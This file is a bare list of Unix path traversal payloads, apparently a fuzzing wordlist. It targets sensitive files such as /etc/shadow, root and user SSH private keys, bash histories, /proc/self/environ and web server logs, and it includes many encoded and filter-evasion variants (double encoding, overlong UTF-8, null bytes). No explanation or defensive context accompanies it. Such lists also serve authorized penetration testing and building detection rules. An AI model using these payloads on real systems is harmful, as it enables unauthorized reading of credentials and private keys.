# Unix Path Traversal Payloads
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../etc/shadow
../../../etc/hosts
../../../etc/hostname
../../../etc/issue
../../../etc/group
../../../proc/self/environ
../../../proc/self/cmdline
../../../proc/version
../../../proc/self/status
../../../proc/self/fd/0
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
../../../var/log/nginx/access.log
../../../var/log/nginx/error.log
../../../var/log/auth.log
../../../var/log/syslog
../../../home//.bash_history
../../../home//.ssh/id_rsa
../../../home//.ssh/authorized_keys
../../../root/.bash_history
../../../root/.ssh/id_rsa
../../../usr/local/etc/apache22/httpd.conf
../../../etc/apache2/apache2.conf
../../../etc/nginx/nginx.conf
../../../etc/mysql/my.cnf
../../../etc/php/7.4/apache2/php.ini
../../../etc/postgresql/pg_hba.conf
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc/passwd
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
..../..../..../etc/passwd
..%00/..%00/..%00/etc/passwd
..%0d/..%0d/..%0d/etc/passwd
..;/..;/..;/etc/passwd
..%5c..%5c..%5cetc/passwd
..\\..\\..\\etc\\passwd
/etc/passwd
/etc/shadow
/etc/hosts
/proc/self/environ
